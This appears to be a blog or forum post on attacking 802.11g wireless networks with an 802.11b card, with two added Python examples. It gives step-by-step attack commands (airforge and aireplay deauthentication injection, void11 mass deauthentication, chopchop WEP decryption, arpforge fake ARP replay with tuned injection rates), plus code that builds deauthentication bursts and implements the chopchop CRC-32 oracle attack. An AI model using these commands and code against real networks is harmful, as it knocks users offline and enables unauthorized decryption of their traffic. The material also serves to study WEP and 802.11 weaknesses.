Aireplay injection
Posted by William
This is a follow-up to the Sunday, May 22 post, 802.11b attacks on 802.11g, on cracking 802.11g networks with an 802.11b card. I've been doing some testing with the new aireplay and managed to inject with all drivers. A couple of interesting things came up: I managed to deauthenticate an 802.11g client with an 802.11b card, and to crack WEP on an all-802.11g network with an 802.11b card (having captured the traffic with an 802.11g card first).
For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point, with both set to 802.11g-only mode. I used an SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g station. To make sure I was actually deauthenticating it, I used wavemon to monitor the Cisco card, which was associated to the AP.
The following settings were used:
Cisco Card
- iwpriv ath0 mode 3 (802.11g mode only)
SMC Card
- wlan-ng drivers for aireplay
- hostap drivers for void11, set up with:
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel [channel]
Commands issued:
Created the deauthentication packet with airforge:
airforge [BSSID] [SRC MAC] deauth
Then injected it with the 802.11b card:
aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0
Used void11 mass deauthentication with the hostap drivers:
void11_penetration wlan0
Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error; void11 will still work. My 802.11g station dropped like a brick.
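What airforge builds in the step above is a plain 802.11 management frame of subtype 12 (deauthentication) addressed to the station with the AP's address as transmitter. The following is an added example, not airforge's or aireplay's code: it builds that frame byte by byte, decodes it again the way a sniffer would, and writes a burst to a pcap so it can be checked in Wireshark. It goes slightly beyond the post in that the burst also sends the frame in the station-to-AP direction, as most injectors do. The MAC addresses are placeholders, not values from the post, and nothing here transmits anything.

```python
import struct

SUBTYPE_DEAUTH = 12             # 802.11 management frame (type 0), subtype 12
REASON_CLASS3_NOT_ASSOC = 7     # reason code: class 3 frame from a non-associated station
LINKTYPE_IEEE802_11 = 105       # pcap link type for raw 802.11 (no radiotap header)


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def bytes_to_mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def deauth_frame(receiver: str, transmitter: str, bssid: str,
                 reason: int = REASON_CLASS3_NOT_ASSOC, seq: int = 0) -> bytes:
    """24-byte management header (frame control, duration, addr1..3, sequence
    control) followed by the 2-byte reason code, all little-endian."""
    frame_control = (SUBTYPE_DEAUTH << 4) | (0 << 2) | 0   # subtype, type 0, version 0
    header = struct.pack("<HH", frame_control, 0)          # flags byte 0, duration 0
    header += mac_to_bytes(receiver)                       # addr1: who should drop
    header += mac_to_bytes(transmitter)                    # addr2: spoofed sender
    header += mac_to_bytes(bssid)                          # addr3: BSSID
    header += struct.pack("<H", (seq & 0xFFF) << 4)        # 12-bit seq number, fragment 0
    return header + struct.pack("<H", reason)


def deauth_burst(bssid: str, station: str, count: int) -> list:
    """AP -> station (what the post does) plus station -> AP, with rising sequence numbers."""
    frames = []
    for i in range(count):
        frames.append(deauth_frame(station, bssid, bssid, seq=i))
        frames.append(deauth_frame(bssid, station, bssid, seq=i))
    return frames


def parse_frame(frame: bytes) -> dict:
    """Decode the header fields back out, enough to confirm the frame is what we meant."""
    fc, duration = struct.unpack_from("<HH", frame, 0)
    seq_ctrl, = struct.unpack_from("<H", frame, 22)
    info = {
        "type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF, "flags": fc >> 8,
        "duration": duration, "seq": seq_ctrl >> 4,
        "addr1": bytes_to_mac(frame[4:10]),
        "addr2": bytes_to_mac(frame[10:16]),
        "addr3": bytes_to_mac(frame[16:22]),
    }
    if info["type"] == 0 and info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"], = struct.unpack_from("<H", frame, 24)
    return info


def pcap_bytes(frames) -> bytes:
    """Minimal pcap file: global header, then (ts_sec, ts_usec, caplen, len) + frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    # Placeholder addresses (constructed), not the post's equipment.
    burst = deauth_burst("00:11:22:33:44:55", "66:77:88:99:aa:bb", 3)
    with open("deauth.pcap", "wb") as fh:
        fh.write(pcap_bytes(burst))
    print(parse_frame(burst[0]))
```

The frame control word is the only part with any bit-fiddling: the first byte holds version, type and subtype, so a deauthentication frame always starts with 0xC0 0x00 on the air. That is also the easiest thing to filter on when you watch the attack from a third card.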
I also managed to crack WEP on an all-802.11g network with my SMC2532W-B 802.11b card. I noticed something strange: when I sniff traffic with aireplay on the 802.11b card, I sometimes manage to capture traffic from the 802.11g network. I am not sure whether this is due to the encoding or something else, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop using my 802.11b SMC card.
Cracking an 802.11g network with an 802.11b card
Used the same equipment as above plus a Netgear WG511 802.11g card.
Captured a packet using aireplay:
aireplay -i eth1
(Sometimes I could also use the 802.11b SMC card to capture traffic. Why? Not sure yet.)
Used chopchop to crack it with the 802.11b card (chopchop only works with Prism-based cards):
chopchop -i wlan0 -b [BSSID] -m [SRC MAC] -p [aireplay packet]
Used arpforge to create a new packet:
arpforge [iv. file] 1 [bssid] [mac src] [ip src] [ip dst] fakearp
Injected the new packet with the 802.11b card:
aireplay -r fakearp wlan0
The IV count would rise. The number of packets per second sent by aireplay can be adjusted with the -x option. The default is 256, but changing it yields better results, and results differ with the number of packets sent per second, so experiment with the value. Between 1500 and 2000 seems to be the sweet spot.
aireplay -r fakearp wlan0 -x 1500
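The chopchop step above is the one piece of the procedure that is not just driver plumbing, so here is what it actually does, as an added example that is not chopchop's own code. WEP appends a CRC-32 (the ICV) to the cleartext and RC4-encrypts both, and CRC-32 is linear: if you cut the last byte off an encrypted packet and guess what that byte decrypts to, a 4-byte correction that depends only on the guess makes the shortened packet carry a valid ICV again. The AP acts as the oracle (it relays the shortened packet only when the ICV checks out), so at most 256 tries reveal one plaintext byte, hence one keystream byte, and the shortened packet becomes the starting point for the next byte. The simulation below builds a constructed packet with a random keystream standing in for RC4 (the attacker side never reads it), puts a Python class in the AP's place, and recovers the whole packet blind. The byte stream is the simplest possible: LLC/SNAP header plus filler, no real ARP packet.

```python
import os
import zlib

# CRC-32 as WEP uses it for the ICV: reflected polynomial 0xEDB88320,
# initial register 0xFFFFFFFF, final complement.
POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# The top byte of a table entry identifies its index, which makes one CRC step invertible.
REV = {TABLE[j] >> 24: j for j in range(256)}


def icv(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the cleartext, appended little-endian."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def _step(state: int, byte: int) -> int:
    return TABLE[(state ^ byte) & 0xFF] ^ (state >> 8)


def _unstep(state: int, byte: int) -> int:
    """Undo one CRC step: the register value before `byte` was fed in."""
    j = REV[state >> 24]
    return (((state ^ TABLE[j]) << 8) | (j ^ byte)) & 0xFFFFFFFF


def register(data: bytes) -> int:
    """CRC register after `data`, without the final complement."""
    s = 0xFFFFFFFF
    for b in data:
        s = _step(s, b)
    return s


# For every valid body data||icv(data) the register ends at the same constant
# (the CRC-32 residue, 0xDEBB20E3). That invariant is all chopchop needs.
RESIDUE = register(icv(b""))


def chop_mask(guess: int) -> bytes:
    """Bytes to XOR onto the last 4 bytes of a body whose final byte was chopped
    so the shortened body is valid again, assuming `guess` was the chopped
    plaintext byte. The mask depends only on `guess`, not on the packet."""
    before_chop = _unstep(RESIDUE, guess)      # register after the shortened body
    delta = before_chop ^ RESIDUE              # how far the register is from valid
    for _ in range(4):                         # CRC over the last 4 bytes is linear
        delta = _unstep(delta, 0)              # in them: invert four zero-input steps
    return delta.to_bytes(4, "little")


class AccessPoint:
    """Stands in for the AP: it holds the keystream and only answers whether a
    submitted body decrypts to data||ICV with a correct ICV (on the air the
    answer is whether the AP relays the frame or silently drops it)."""

    def __init__(self, keystream: bytes):
        self._ks = keystream
        self.queries = 0

    def accepts(self, body: bytes) -> bool:
        self.queries += 1
        plain = bytes(c ^ k for c, k in zip(body, self._ks))
        return len(plain) >= 4 and icv(plain[:-4]) == plain[-4:]


def chopchop(ap: AccessPoint, cipher: bytes) -> bytes:
    """Recover the keystream byte by byte from the end (at most 256 oracle
    queries per byte) and return the decrypted body data||ICV."""
    keystream = bytearray(len(cipher))
    cur = cipher
    while len(cur) > 4:
        pos = len(cur) - 1
        for guess in range(256):
            mask = chop_mask(guess)
            candidate = cur[:-5] + bytes(a ^ b for a, b in zip(cur[-5:-1], mask))
            if ap.accepts(candidate):
                keystream[pos] = cur[pos] ^ guess   # plaintext known, so keystream known
                cur = candidate                     # shorter but valid: go again
                break
        else:
            raise RuntimeError("no guess accepted: not a valid WEP body, or the oracle lies")
    # Four bytes left: a valid body with no data, whose plaintext is icv(b"").
    for i, p in enumerate(icv(b"")):
        keystream[i] = cur[i] ^ p
    return bytes(c ^ k for c, k in zip(cipher, keystream))


def demo():
    """Constructed packet: LLC/SNAP header plus filler, random bytes standing in
    for the RC4 keystream, then chopchop run blind against the oracle."""
    data = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(range(28))
    body = data + icv(data)
    keystream = os.urandom(len(body))
    cipher = bytes(p ^ k for p, k in zip(body, keystream))
    ap = AccessPoint(keystream)
    recovered = chopchop(ap, cipher)
    return recovered == body, ap.queries


if __name__ == "__main__":
    ok, queries = demo()
    print("recovered plaintext:", ok, "oracle queries:", queries)
```

Two things carry over to the real tool. First, nothing in the attack touches RC4 or the key: it is entirely a property of CRC-32, which is why the card that captured the packet and the card that talks to the AP can be different. Second, the oracle only works while the AP keeps relaying shortened packets, which is why chopchop needs the BSSID and a source MAC the AP will accept, and why a packet that is too short or that the AP refuses to relay stalls the attack rather than failing loudly.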
- Thanks to radi0head and re@lity for this.
Please test my results to verify that they are consistent with your equipment. As for the 802.11b card capturing 802.11g traffic, it is strange: I set my Cisco Atheros card to G-only mode with iwpriv ath0 mode 3, and my Netgear AP is set to G-only mode as well. Please test this too. Post your results on the forum and use the date of this post as the title.
~William